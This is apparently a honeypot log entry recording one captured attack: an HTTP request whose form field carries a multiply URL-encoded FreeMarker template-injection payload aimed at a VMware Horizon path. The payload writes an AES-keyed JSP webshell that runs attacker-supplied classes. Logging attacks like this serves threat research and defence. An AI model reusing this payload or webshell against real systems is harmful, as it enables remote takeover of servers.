Attack f6750f44-cf9a-4504-bcd0-9d01e66bf24f

Details

ID f6750f44-cf9a-4504-bcd0-9d01e66bf24f
Attack Type elasticsearch
IP Address 75.127.11.24
Username
Password
Client Version Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Country United States
Date 2023-06-03 02:18PM

Request Data

{
   "path": "",
   "method": "GET",
   "headers": {
     "Accept": "*/*",
     "Connection": "keep-alive",
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
     "Accept-Encoding": "gzip, deflate"
   },
   "hostname": "localhost",
   "form_data": {
     "deviceUdid": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/Pg45znc.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%25252525252525253C%252525252525252525%252525252525252540page%252525252525252Bimport%25252525252525253D%25252525252525255C%252525252525252522java.util.%25252525252525252A%25252525252525252Cjavax.crypto.%25252525252525252A%25252525252525252Cjavax.crypto.spec.%25252525252525252A%25252525252525255C%252525252525252522%252525252525252525%25252525252525253E%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%25252525252525253C%252525252525252525%252525252525252521%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252Bclass%252525252525252BU%252525252525252Bextends%252525252525252BClassLoader%25252525252525257B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252BU%252525252525252528ClassLoader%252525252525252Bc%252525252525252529%252525252525252B%25252525252525257B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252Bsuper%252525252525252528c%252525252525252529%25252525252525253B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%25252525252525257D%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252Bpublic%252525252525252BClass%252525252525252Bg%252525252525252528byte%252525252525252B%25252525252525255B%25252525252525255Db%252525252525252529%252525252525252B%25252525252525257B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252Breturn%252525252525252Bsuper.defineClass%252525252525252528b%25252525252525252C0%25252525252525252Cb.length%252525252525252529%25252525252525253B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%25252525252525257D%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%25252525252525257D%252525252525252525%25252525252525253E%25252525252525253C%252525252525252525%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252Bif%252525252525252B%252525252525252528request.getMethod%252525252525252528%252525252525252529.equals%252525252525252528%25252525252525255C%252525252525252522POST%25252525252525255C%252525252525252522%252525252525252529%252525252525252529%25252525252525257B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252BString%252525252525252Bk%25252525252525253D%25252525252525255C%252525252525252522e45e329feb5d925b%25252525252525255C%252525252525252522%25252525252525253B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252Bsession.putValue%252525252525252528%25252525252525255C%252525252525252522u%25252525252525255C%252525252525252522%25252525252525252Ck%252525252525252529%25252525252525253B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252BCipher%252525252525252Bc%25252525252525253DCipher.getInstance%252525252525252528%25252525252525255C%252525252525252522AES%25252525252525255C%252525252525252522%252525252525252529%25252525252525253B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252Bc.init%2525252525252525282%25252525252525252Cnew%252525252525252BSecretKeySpec%252525252525252528k.getBytes%252525252525252528%252525252525252529%25252525252525252C%25252525252525255C%252525252525252522AES%25252525252525255C%252525252525252522%252525252525252529%252525252525252529%25252525252525253B%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252Bnew%252525252525252BU%252525252525252528this.getClass%252525252525252528%252525252525252529.getClassLoader%252525252525252528%252525252525252529%252525252525252529.g%252525252525252528c.doFinal%252525252525252528new%252525252525252Bsun.misc.BASE64Decoder%252525252525252528%252525252525252529.decodeBuffer%252525252525252528request.getReader%252525252525252528%252525252525252529.readLine%252525252525252528%252525252525252529%252525252525252529%252525252525252529%252525252525252529.newInstance%252525252525252528%252525252525252529.equals%252525252525252528pageContext%252525252525252529%25252525252525253B%25252525252525257D%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252525%25252525252525253E%25252525252525250A%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%252525252525252B%25252525252525253C%252525252525252525out.println%252525252525252528%25252525252525255C%252525252525252522e8418d1d706cd73548f9f16f1d55ad6e%25252525252525255C%252525252525252522%252525252525252529%252525252525252B%25252525252525253B%252525252525252525%25252525252525253E\").getBytes())}"
   }
 }
© 2021 threat.gg